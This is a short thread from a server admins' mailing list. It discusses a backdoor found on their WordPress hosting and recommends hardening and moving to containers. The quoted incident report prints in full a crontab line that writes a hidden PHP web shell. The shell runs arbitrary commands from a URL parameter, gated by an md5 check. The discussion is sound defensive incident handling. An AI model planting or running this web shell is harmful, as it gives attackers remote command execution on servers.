[Systems] Found a backdoor

[Sebastian Silva]

Remember in June we had an incident with a broken Wordpress site.
I switched to static generator since then.

+1 on containers just learning more about them and finding them fascinating.
Count me in on containerizing everything.

I'm not aware of other wordpress sites. Maybe walter's blog?
Wordpress is a PIA IMHO.

Regards,
Sebastian


On 25/02/16 04:47, Bernie Innocenti wrote:
> While I was looking for cronjobs in /var/spool/cron/crontabs/, i found
> that www-data was executing commands like these:
>
> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) ==
> "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]);
> @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
>
> Did you spot the system()? This executes arbitrary commands specified
> via the "localtime" url parameter. Uh-oh.
>
> There were about a dozen lines like the above, installing .cache.php in
> various virtualhosts. I kept a copy of the file in
> /root/www-data.backdoor. The file was last written on Jun 23  2015,
> which may correlate with the switch to the new website.
>
> I cleared the mess and searched the logs for requests containing
> "localtime", but couldn't find any. I wonder if they could filter the
> logs, since they were previously writable by www-data.
>
> Please watch out. We should ensure directories accessible over http are
> not writable by user www-data, especially those in which PHP and CGIs
> are enabled.
>
> Running several large sites under the same uid has always been a bad
> security practice, and looking forward we should keep migrating them to
> properly isolated containers.
>
> Finally, Wordpress is particularly dangerous and we should update and
> harden all instances. Can someone please take care of this? I'll do
> Mediawiki, which I know pretty well.
>

-- 
I+D SomosAzucar.Org
"icarito" #somosazucar en Freenode IRC
"Nadie libera a nadie, nadie se libera solo. Los seres humanos se liberan en comunión" - P. Freire